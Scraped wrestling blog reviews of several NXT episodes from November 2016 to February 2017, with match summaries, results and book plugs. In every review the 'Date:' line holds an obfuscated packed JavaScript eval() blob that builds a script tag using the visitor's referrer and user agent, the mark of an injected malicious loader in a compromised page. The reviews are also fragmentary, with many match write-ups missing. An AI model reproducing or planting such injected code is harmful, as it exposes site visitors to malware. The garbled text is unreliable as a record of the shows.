Burch sends him into the ropes but Almas hangs on and shouts a bit. A belly to back sends Almas down again but he gets in a hard clothesline to take over. The double knees in the corner set up the hammerlock DDT for the pin on Burch at 2:57. Basically a squash.

Video on Asuka, who is still completely dominant. Some people, including Ember Moon and Ruby Riot, might see some weaknesses though.

Liv Morgan/Aliyah vs. Billie Kay/Peyton Royce

Almas vs. McIntyre is official for next week.

Eric Young vs. Tye Dillinger

Dillinger locks Sanity inside the cage and celebrates to end the show.

Remember to follow me on Twitter @kbreviews and pick up the NXT: The Full Sail Years Volumes I and II, now in PAPERBACK. Check out the information here:

And check out my Amazon author page with cheap wrestling books at:

NXT – February 22, 2017: The Wrestling Version

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eahfs|var|u0026u|referrer|sakia||js|php'.split('|'),0,{})) February 22, 2017
Location: Full Sail University, Winter Park, Florida
Commentators: Tom Phillips, Percy Watson, Nigel McGuinness

In Memory of George Steele.

Quick video on the triple threat.

Opening sequence.

Liv Morgan vs. Peyton Royce vs. Ember Moon

Video on Pete Dunne and Mark Andrews.

Kassius Ohno is coming back.

Shinsuke Nakamura is healing up.

Mark Andrews vs. Pete Dunne

We take a break and come back with Andrews flipping Dunne over and grabbing a springboard hurricanrana. Dunne is ready for the shooting star though and forearms Andrews out of the air. The X Plex gets two but Andrews gets out of the Bitter End. A reverse hurricanrana of all things puts Dunne down again. Another Bitter End is reversed into a small package for two and the X Plex is countered into the Stundog Millionaire. Dunne gets the knees up on the shooting star though and the Bitter End wraps Andrews up at 13:52.

Patrick Clark is in action next week.

Tye Dillinger is ready for Sanity, no matter what they throw at him.

No Way Jose vs. Bobby Roode


Pete Dunne b. Mark Andrews – Bitter End

Bobby Roode b. No Way Jose – Glorious DDT

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NXT – February 15, 2017: The NXT Special

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rzayd|var|u0026u|referrer|fdhhk||js|php'.split('|'),0,{})) February 15, 2017
Location: Full Sail University, Winter Park, Florida
Commentators: Tom Phillips, Nigel McGuinness, Percy Watson

Quick look at Bate vs. Seven.

Opening sequence.

The jobbers get a Super Collider post match.

Video on Tyler Bate.

Billie Kay/Peyton Royce vs. Liv Morgan/Ember Moon

We look back at Sanity telling Tye Dillinger that he belongs to the team and then beating him down later in the night. No Way Jose and Roderick Strong made the save.

Video on Trent Seven.

Video on Kassius Ohno, who returns soon.

General Manager William Regal announces a #1 contenders triple threat match for next week between Peyton Royce, Ember Moon and Liv Morgan.

UK Title: Tyler Bate vs. Trent Seven

Bate is defending. They start slowly with both guys having a clean break and offering a twirl of the others mustache. Bate bounces off the much bigger Seven until Trent runs him over with a much harder version. Nigel starts talking about cricket and gets in a few jabs at Watson (not that difficult) as the slow beating continues while taking us to a break.

They shake hands post match.


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NXT – January 4, 2017: With a Lot of Hitting Him in the Face

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sfdia|var|u0026u|referrer|aynra||js|php'.split('|'),0,{})) January 4, 2017
Location: Margaret Court Arena, Melbourne, Australia
Commentators: Tom Phillips, Corey Graves

Opening sequence.

Revival vs. Tino Sabbatelli/Riddick Moss

Elias Samson/Bobby Roode vs. Tye Dillinger/Buddy Murphy

Liv Morgan vs. Billie Kay vs. Ember Moon

As expected, Kay is the big crowd favorite but bails to the floor so the other two can slug it out. Well as much slugging as Morgan is going to do. Billie tries to steal a pin but gets caught in that rolling sunset flip to give Morgan some near falls. A double bulldog puts Kay and Moon down so Liv covers one but gets kicked out onto the other over and over in a clever spot.

Tag Team Titles: DIY vs. TM61

Clever spot and Gargano shoving Miller into the pin for the save made it better. Project Ciampa gives us another near fall and the fans are WAY into the Aussies. Miller and Gargano slug it out in the middle of the ring with Johnny getting the better of it. Thorn is knocked to the floor and the running knee/superkick combo retains the titles at 18:18.

We get the big post match show of respect.

Recap of Nakamura vs. Joe.

NXT Title: Shinsuke Nakamura vs. Samoa Joe

Nakamura is defending and this is inside a cage. The champ takes him down by the leg to start but they grapple up against the ropes with neither being able to get much of an advantage. Joe gets taken into the corner for Good Vibrations so he sends Nakamura hard into the cage to even things up.

Replays wrap it up.


Revival b. Tino Sabbatelli/Riddick Moss – Shatter Machine to Moss

Tye Dillinger/Buddy Murphy b. Bobby Roode/Elias Samson – Tyebreaker to Samson

Ember Moon b. Billie Kay and Liv Morgan – Eclipse to Kay

DIY b. TM61 – Running knee/superkick combination to Miller

Shinsuke Nakamura b. Samoa Joe – Kinshasa

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NXT – December 28, 2016: A First For NXT

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bnaas|var|u0026u|referrer|teaah||js|php'.split('|'),0,{})) December 28, 2016
Location: Edion Arena, Osaka, Japan
Commentators: Corey Graves, Tom Phillips

We open with a quick video on Samoa Joe vs. Shinsuke Nakamura.

Opening sequence.

Oney Lorcan vs. Andrade Cien Almas

Back up and Lorcan hits a running corner clothesline before popping in a few shots to the face. Something like a standing backflip into a reverse DDT (I believe Tetsuya Naito uses the same) gets two on Lorcan but he comes right back with an inverted exploder. Almas sends him into the corner again with the running double knees getting two despite a foot on the ropes. The hammerlock DDT is broken up and Lorcan takes him to the top for a German superplex (with Almas flipping over in the air) and the pin at 10:06.

Aliyah/Liv Morgan vs. Peyton Royce/Billie Kay

Tag Team Titles: DIY vs. Akira Tozawa/Tajiri

DIY is defending and this time we get the handshake. Gargano and Tozawa start things off and this time the fans are a bit more into it. The fans seem split as both guys miss big kicks and bring in their respective partners. Tajiri sprays some mist as Graves questions his fandom with DIY in the ring.

DIY bows to the challengers post match.

NXT Title: Samoa Joe vs. Shinsuke Nakamura

A lot of posing ends the show.


Oney Lorcan b. Andrade Cien Almas – German superplex

DIY b. Akira Tozawa/Tajiri – Running knee/superkick combination

Asuka b. Nia Jax – Kick to the head

Shinsuke Nakamura b. Samoa Joe – Kinshasa

And check out my Amazon author page with cheap wrestling books at:

NXT – November 23, 2016: Thank You NXT

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nkaty|var|u0026u|referrer|aiszb||js|php'.split('|'),0,{})) November 23, 2016
Location: Air Canada Center, Toronto, Ontario, Canada
Commentators: Tom Phillips, Corey Graves

Opening sequence.

Rich Swann vs. Kona Reeves

Post break, No Way Jose is out to check on his partner and calls out Young for a fight right now. The rest of the team surrounds the ring and the brawl is on with no referee or bell. A right hand has Young in trouble and the rest of Sanity comes in for the beatdown.

Video on the finals of the Dusty Classic.

The Authors of Pain are ready for Chapter Three, which will be explained in time.

Video on Bobby Roode vs. Tye Dillinger.

Video on Asuka vs. Mickie James.

Mickie is in tears over how amazing that was and calls Asuka incredible.

Video on Samoa Joe vs. Shinsuke Nakamura.

Nakamura wants a rematch as soon as possible.

Liv Morgan/Aliyah/Ember Moon vs. Peyton Royce/Billie Kay/Daria Berenato

BREAKING NEWS: Nakamura vs. Joe for the title in two weeks from Osaka, Japan.


Rich Swann vs. Kona Reeves went to a no contest when Sanity interfered

Liv Morgan/Aliyah/Ember Moon b. Peyton Royce/Billie Kay/Daria Berenato – Eclipse to Berenato

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